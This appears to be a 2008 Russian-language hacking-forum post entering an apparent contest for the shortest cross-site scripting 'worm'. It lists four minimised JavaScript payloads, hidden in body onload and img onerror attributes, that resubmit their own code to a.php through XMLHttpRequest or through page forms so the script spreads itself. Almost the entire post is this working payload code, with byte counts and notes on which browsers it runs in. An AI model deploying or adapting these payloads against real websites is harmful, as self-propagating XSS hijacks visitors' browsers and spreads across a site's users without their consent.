17.01.2008, 02:13
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100
Репутация:
2033
|
|
1) 141, FF
два небольших креативчика и -21
PHP код:
<body onload="with(new XMLHttpRequest)(open('POST','a.php'),setRequestHeader('content-type','multipart/form-data'),send('xss='+this.onload))"
2) юзаем готовую форму в полной мере, ибо по правилам нет запрета, если яваскриптом
A) 105, FF & IE 6.0
PHP код:
<img src=. onerror="with(forms[0])submit(action='a.php',e=elements[0],e.name='xss',e.value=this.onerror)"
Б) 107, Multi
PHP код:
<body onload="with(document.forms[0])submit(action='a.php',e=elements[0],e.name='xss',e.value=this.onload)"
3) самый малый размер "червя", использующего форму, созданную средствами DOM (вариант от +toxa+), можно получить для IE 6.0-7.0
166, IE 6.0-7.0
PHP код:
<img src=. onerror="with(body.appendChild(createElement('<form action=a.php method=post>')))submit(appendChild(createElement('<input name=xss>')).value=this.onerror)"
Последний раз редактировалось LeverOne; 18.01.2008 в 02:07..
|
|
|